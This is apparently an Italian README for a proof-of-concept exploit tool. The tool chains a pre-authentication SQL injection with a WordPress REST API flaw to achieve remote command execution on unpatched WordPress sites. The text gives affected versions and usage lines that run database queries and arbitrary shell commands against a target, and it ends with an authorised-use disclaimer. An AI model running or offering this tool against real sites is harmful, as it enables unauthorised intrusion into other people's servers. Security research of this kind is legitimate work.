
PoC RCE stock per WordPress vulnerabile per wp2shell.
Il primo PoC in assoluto della SQL injection basata su timing in pre-autenticazione per la catena di confusione batch-route dell'API REST di WordPress (CVE-2026-63030 + CVE-2026-60137)
Ottiene l'esecuzione di comandi, senza limitarsi a tentare di forzare la password dell'amministratore.
Versioni interessate: WordPress 6.9.0–6.9.4 e 7.0.0–7.0.1. Corretto in 6.9.5 e 7.0.2.
python3 poc.py https://target.example
python3 poc.py https://target.example 'SELECT DATABASE()'
python3 poc.py https://target.example -c "echo "you got pwned" > /tmp/pwned.txt && id"
Ricerca: Searchlight Cyber · Aikido · Aikido Intel · WordPress
Disclaimer: Questa prova di concetto è fornita esclusivamente per finalità educative autorizzate, di ricerca sulla sicurezza e di risposta agli incidenti; pertanto, usala solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test.